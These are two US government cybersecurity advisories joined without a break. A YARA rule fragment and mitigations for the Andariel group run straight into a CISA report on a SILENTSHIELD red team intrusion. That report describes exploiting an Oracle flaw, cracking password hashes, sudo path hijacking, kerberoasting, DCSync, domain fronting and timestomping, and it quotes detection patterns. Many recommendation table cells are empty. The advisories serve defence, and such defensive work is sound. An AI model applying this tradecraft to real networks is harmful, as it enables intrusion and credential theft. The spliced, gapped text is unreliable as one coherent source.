6, score = 300 // 8b4d0c | mov ecx, dword ptr [ebp + 0xc] // 51 | push ecx // 68???????? | // 8d9560eaffff | lea edx, [ebp - 0x15a0] // 52 | push edx // e8???????? | $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 } // n = 5, score = 300 // 83c001 | add eax, 1 // 8945f4 | mov dword ptr [ebp - 0xc], eax // 837df420 | cmp dword ptr [ebp - 0xc], 0x20 // 7d2c | jge 0x2e // 8b4df8 | mov ecx, dword ptr [ebp - 8] $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 } // n = 4, score = 300 // 83c001 | add eax, 1 // 89856cf6ffff | mov dword ptr [ebp - 0x994], eax // 8b8d70f6ffff | mov ecx, dword ptr [ebp - 0x990] // 8a11 | mov dl, byte ptr [ecx] $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 } // n = 6, score = 200 // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx] // 0fb64df7 | movzx ecx, byte ptr [ebp - 9] // 33c1 | xor eax, ecx // 0fb655fc | movzx edx, byte ptr [ebp - 4] // 33c2 | xor eax, edx $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 } // n = 5, score = 200 // d1e9 | shr ecx, 1 // 894df8 | mov dword ptr [ebp - 8], ecx // 8b5518 | mov edx, dword ptr [ebp + 0x18] // 8955fc | mov dword ptr [ebp - 4], edx // c745f000000000 | mov dword ptr [ebp - 0x10], 0 $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 } // n = 6, score = 200 // 8b4df0 | mov ecx, dword ptr [ebp - 0x10] // 3b4d10 | cmp ecx, dword ptr [ebp + 0x10] // 0f8d90000000 | jge 0x96 // 8b5508 | mov edx, dword ptr [ebp + 8] // 0355f0 | add edx, dword ptr [ebp - 0x10] // 0fb602 | movzx eax, byte ptr [edx] $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 } // n = 6, score = 200 // 894d14 | mov dword ptr [ebp + 0x14], ecx // 8b45f8 | mov eax, dword ptr [ebp - 8] // c1e018 | shl eax, 0x18 // 8b4dfc | mov ecx, dword ptr [ebp - 4] // c1e908 | shr ecx, 8 // 0bc1 | or eax, ecx $sequence_13 = { 0bc1 894518 8b5514 8955f8 } // n = 4, score = 200 // 0bc1 | or eax, ecx // 894518 | mov dword ptr [ebp + 0x18], eax // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 } // n = 6, score = 200 // 8b5514 | mov edx, dword ptr [ebp + 0x14] // 8955f8 | mov dword ptr [ebp - 8], edx // 8b4518 | mov eax, dword ptr [ebp + 0x18] // 8945fc | mov dword ptr [ebp - 4], eax // e9???????? | // 8be5 | mov esp, ebp condition: 7 of them and filesize < 1736704 } |
The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.
Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.
Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.
Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.
Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.
Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).
Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.
Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.
Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.
The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.
Mandiant and Microsoft Threat Intelligence contributed to this CSA.
Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.
Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.
DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil
DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.
National Intelligence Service: www.nis.go.kr, +82 111
AhnLab Security Emergency Response Center:
Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html
Cisco Talos Intelligence blogs:
DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499
Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar
JPCERT blogs:
Mandiant blogs:
Microsoft blogs:
NSCS Guidance:
Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html
WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector
The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.
Technique Title | ID | Use |
---|---|---|
Gather Victim Org Information | T1591 | The actors gather information about the victim’s organization that can be used during targeting. |
Gather Victim Host Information | T1592 | The actors gather information about the victim’s hosts that can be used during targeting. |
Active Scanning | T1595 | The actors execute active reconnaissance scans to gather information that can be used during targeting. |
Search Open Technical Databases | T1596 | The actors search freely available technical databases for information about victims that can be used during targeting. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel. |
Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |
Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
Protocol Tunneling | T1572 | The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. |
Develop Capabilities: Malware | T1587.001 | The actors develop malware and malware components that can be used during targeting. |
Develop Capabilities: Exploits | T1587.004 | The actors develop exploits that can be used during targeting. |
Software Title | ID | Use |
---|---|---|
Mimikatz | S0002 | The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. |
AdFind | S0552 | The actors use a free command-line query tool that can be used for gathering information from the Active Directory. |
Technique Title | ID | Use |
---|---|---|
Exploit Public-Facing Application | T1190 | The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter | T1059 | The actors abuse command and script interpreters to execute commands, scripts, or binaries. |
Technique Title | ID | Use |
---|---|---|
Obfuscated Files or Information | T1027 | The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
Technique Title | ID | Use |
---|---|---|
Remote Services | T1021 | The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. |
Remote Services: SMB/Windows Admin Shares | T1021.002 | The actors use valid accounts to interact with a remote network share using Server Message Block (SMB). |
File and Directory Discovery | T1083 | The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
Account Discovery | T1087 | The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
Technique Title | ID | Use |
---|---|---|
Application Layer Protocol | T1071 | The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus. |
Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. |
Technique Title | ID | Use |
---|---|---|
Data from Network Shared Drive | T1039 | The actors search network shares on computers they have compromised to find files of interest. |
Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server. |
Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
Exfiltration Over Web Service | T1567 | The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. |
In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture. Then, the team works directly with the organization’s network defenders, system administrators, and other technical staff to address strengths and weaknesses found during the assessment. The team’s goal is to assist the organization with refining their detection, response, and hunt capabilities—particularly hunting unknown threats.
In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory (CSA) detailing the red team’s activity and tactics, techniques, and procedures (TTPs); associated network defense activity; and lessons learned to provide network defenders with recommendations for improving their organization’s detection capabilities and cyber posture.
During the first phase, the SILENTSHIELD team gained initial access by exploiting a known vulnerability in an unpatched web server in the victim’s Solaris enclave. Although the team fully compromised the enclave, they were unable to move into the Windows portion of the network due to a lack of credentials. In a parallel effort, the team gained access to the Windows network through phishing. They then discovered unsecured administrator credentials, allowing them to pivot freely throughout the Windows environment, which resulted in full domain compromise and access to tier zero assets. The team then identified that the organization had trust relationships with multiple external partner organizations and was able to exploit and pivot to an external organization. The red team remained undetected by network defenders throughout the first phase.
The red team’s findings underscored the importance of defense-in-depth and using diversified layers of protection. The organization was only able to fully understand the extent of the red team’s compromise by running full diagnostics from all data sources. This involved analyzing host-based logs, internal network logs, external (egress) network logs, and authentication logs.
The red team’s findings also demonstrated the value of using tool-agnostic and behavior-based indicators of compromise (IOCs) and of applying an “allowlist” approach to network behavior and systems, rather than a “denylist” approach, which predominantly results in an unmanageable amount of noise. The red team’s findings illuminated the following lessons learned for network defenders about how to reduce and respond to risk:
To reduce risk of similar malicious cyber activity, CISA encourages organizations to apply the recommendations in the Mitigations section of this advisory, including those listed below:
CISA recognizes that insecure software contributes to these identified issues and urges software manufacturers to embrace Secure by Design principles and implement the recommendations in the Mitigations section of this CSA, including those listed below, to harden customer networks against malicious activity and reduce the likelihood of domain compromise:
Download the PDF version of this report:
CISA has authority to hunt for and identify, with or without advance notice to or authorization from agencies, threats and vulnerabilities within federal information systems (see generally 44 U.S.C. § 3553[b][7]). The target organization for this assessment was a large U.S. FCEB organization. CISA conducted the SILENTSHIELD assessment over an approximately eight-month period in 2023, with three of the months consisting of a technical collaboration phase:
This advisory, drafted in coordination with the assessed organization, details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders recommendations for improving their organization’s defensive cyber posture. The advisory also provides recommendations to software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
During the Adversary Emulation phase, the red team gained initial access to the organization’s Solaris enclave by exploiting a known vulnerability in an unpatched web server. They gained separate access to the Windows environment by phishing and were able to compromise the full domain and its parent domain. See Figure 1 for a timeline of this assessment and the sections below for details on the team’s activity and TTPs.
CISA’s red team used open source tools and third-party services to probe the organization’s internet-facing surface [T1594]. This included non-intrusive port scans for common ports and Domain Name System (DNS) enumeration [T1590.002]. These efforts revealed the organization’s web server was unpatched for CVE-2022-21587, an unauthenticated remote code execution (RCE) vulnerability in Oracle Web Applications Desktop Integrator. For three months the assessed organization failed to patch this vulnerability, and the team exploited it for initial access.
The exploit provided code execution on a backend application server (SERVER 1) that handled incoming requests from the public-facing web server. The red team used this exploit to upload and run a secure Python remote access tool (RAT). Because the application server had full external internet egress via Transmission Control Protocol (TCP) ports 80
and 443
, the RAT enabled consistent command and control (C2) traffic [T1071.001].
Note: After gaining access, the team promptly informed the organization’s trusted agents of the unpatched device, but the organization took over two weeks to apply the available patch. Additionally, the organization did not perform a thorough investigation of the affected servers, which would have turned up IOCs and should have led to a full incident response. About two weeks after the team obtained access, exploit code was released publicly into a popular open source exploitation framework. CISA identified that the vulnerability was exploited by an unknown third party. CISA added this CVE to its Known Exploited Vulnerabilities Catalog on Feb. 2, 2023.
Once on SERVER 1, the red team probed the host’s files and folder structure [T1005] and identified several old and globally accessible .tar
backup files, which included a readable copy of an /etc/shadow
file containing the hash for a privileged service account (ACCOUNT 1). The team quickly cracked the account’s weak password using a common wordlist [T1110.002]. They then established an outbound Secure Shell Protocol (SSH) connection over TCP port 80
and used a reverse tunnel to SSH back into SERVER 1, where they were prompted to reset ACCOUNT 1’s expired password [T1571] (see Figure 2). The team identified the account was enabled on a subset of containers, but it had not been actively used in a significant amount of time; the team changed this account’s password to a strong password.
The team discovered ACCOUNT 1 was a local administrator with sudo/root
access and used it to move laterally (see the next section).
Servers in the Solaris enclave did not use centralized authentication but had a mostly uniform set of local accounts and permissions [T1078.002]. This allowed the red team to use ACCOUNT 1 to move through much of the network segment via SSH [T1021.004].
Some servers allowed external internet access and the team deployed RATs on a few of these hosts for C2. They deployed several different RATs to diversify network traffic signatures and obfuscate the on-disk and in-memory footprints. These tools communicated to a red team redirector over TCP/443
, through valid HTTPS messages, and over SSH through non-standard ports (80
and 443
) [T1571]. Much of the traffic was not blocked by a firewall, and the organization lacked application layer firewalls capable of detecting protocol mismatches on common ports.
The team then moved laterally to multiple servers, including high value assets, that did not allow internet access. Using reverse SSH tunnels, the team moved into the environment and used a SOCKS proxy [T1090] to progress forward through the network. They configured implants with TCP bind listeners bound to random high ports to connect directly with some of these hosts without creating new SSH login events (see Figure 3).
Once on other internal hosts, the team data mined each for sensitive information and credentials. They obtained personally identifiable information (PII), shadow files, a crackable pass-phrase protected administrator SSH key, and a plaintext password [T1552.003] in a user’s .bash_history
. These data mined credentials provided further avenues for unprivileged access through the network. The team also used SSH tunnels to remotely mount Network File System (NFS) file shares, spoofing uid
and gid
values to access all files and folders.
To protect against reboots or other disruptions, the team primarily persisted on hosts using the cron
utility [T1053.003], as well as the at
utility [T1053.002], to run scheduled tasks and blend into the environment. Additionally, SSH private keys provided persistent access to internal pivot hosts and would have continued to enable access even if passwords were rotated.
Although ACCOUNT 1 allowed the team to move laterally to much of the Solaris enclave, the account did not provide privileged access to all hosts in the network because a subset of hosts had changed the password (which denied privileged access via that account). However, the team analyzed recent user logins using the last
command and identified a network security appliance scanning service account (ACCOUNT 2) that logged in regularly to an internal host using password-based authentication. As part of its periodic vulnerability scanning, ACCOUNT 2 would connect to each host via SSH and run sudo
with a relative path instead of the absolute path /usr/local/bin/sudo
. The local path created a path hijack vulnerability, which allowed the red team to hijack the execution flow and capture the account’s password [T1574.007].
The harvested password granted unrestricted privileged access to the entire Solaris enclave.
While the compromise of the Solaris enclave facilitated months of persistent access to sensitive systems, including web applications and databases, it did not lead to the immediate compromise of the corporate Windows environment. Once in the Windows domain, the red team identified several service accounts with weak passwords. It is likely that an adversary could have continued the Solaris attack path through prolonged password spraying attacks, or by leveraging credentials obtained externally (e.g., dark web credential dumps) (see Figure 4).
The team exploited the Windows domain through other access vectors and eventually proved the undetected pivot between the domains could be made after they obtained Windows credentials.
While attempting to pivot into Windows from Solaris, the red team conducted open source information gathering about the organization. They harvested employee names [T1589.003] and used the information to derive email addresses based on the target’s email naming scheme. After identifying names, emails, and job titles, the team selected several phishing targets who regularly interacted with the public [T1591.004]. One user triggered a phishing payload that provided initial access to a workstation.
The team then placed a simple initial access RAT on the workstation in a user-writable folder and obtained user-level persistence through an added registry run key, which called back to a red team redirector via HTTPS. The team assessed what was running on the host in terms of antivirus (AV) and Endpoint Detection and Response (EDR) and used the implant to inject a more capable, full-fledged RAT directly into memory, which pointed to a separate redirector. The assessed organization’s tools failed to categorize C2 traffic as anomalous even when a bug in one of the implants caused 8 GB of continuous network traffic to flow in one afternoon.
Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe
in .NET
and Beacon Object File (BOF) ldapsearch
from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM).
The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001].
The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004].
The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism.
The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts.
The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync
[T1003.006], obtaining full domain compromise (see Figure 5).
After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior.
The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally.
The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6).
These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors.
Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions.
Solaris Enclave Figure 5: Exploitation of the Windows Domain
Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm
command only captures the program being run—full file path and any command line arguments are not recorded. For example:
/opt/splunkforwarder/bin/splunkd
/opt/splunkforwarder/splunkd
splunkd
The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch
and chmod/chown
commands [T1222.002] to blend with other files in the environment.
Windows Domain
The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027].
Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised.
To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET
executables to run additional capabilities.
All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host
header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445
and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection.
Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity.
During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise:
Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps:
All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs.
Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations.
The assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage.
The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses.
Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses.
Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders—using either the native touch -r
command or implants’ timestomp
command to disguise the last-modified timestamp captured in the output of ls –la
. Secondary file timestamps identified with ls -lu
or ls -lc
would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation.
The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example:
CommandLine=kerberoast*
or files called bloodhound.zip
) and did not detect the team’s kerberoasting activity.Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example:
The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations:
.xml
file) to a globally readable C:Windows
directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads.sc.exe
rather than service creation events).C:Program Files (x86)GoogleUpdate*
).The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings.
The assessed organization promptly planned for and resolved multiple identified issues, including with:
CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Finding | Recommendation |
---|---|
Inadequate firewall between perimeter and internal devices |
|
Insufficient Network Segmentation |
|
Trust relationships between domains were overly permissive |
|
Defensive activity was not sufficiently isolated | |
IDM solutions were not fully understood and utilized |
|
Insufficient role-based host segmentation |
|
Failure to monitor EDR alerts daily |
|
Host artifacts were overly trusted |
|
Bureaucracy and decentralization of network defenders hampered communication and consistency |
|
Insufficient internal incident response report |
|
Focus on known/common IOCs |
|
Detection rules were visible from compromised systems |
|
Insufficient restriction of admin tools |
|
Insufficient tracking of software |
|
CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments.
Issue | Recommendation |
---|---|
Accounts were overprivileged and the organization’s network contained unnecessary service accounts |
|
Insufficient EDR configuration |
|
Insecure and insufficient credentials |
|
Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourage all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge.
CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following:
These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.
July 11, 2024: Initial version.
See Tables 3–11 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Search Victim-Owned Websites | T1594 | CISA’s red team used open source tools and services to probe the organization’s internet-facing presence and gather information, including names, roles, and contact information. |
Gather Victim Network Information: DNS | T1590.002 | The red team gathered information about the organization’s DNS records, which revealed several details about the organization's internal network. |
Gather Victim Identity Information: Employee Names | T1589.003 | CISA’s red team collected the assessed organizations’ employee names to use their email addresses for specific targeting based on roles and responsibilities. |
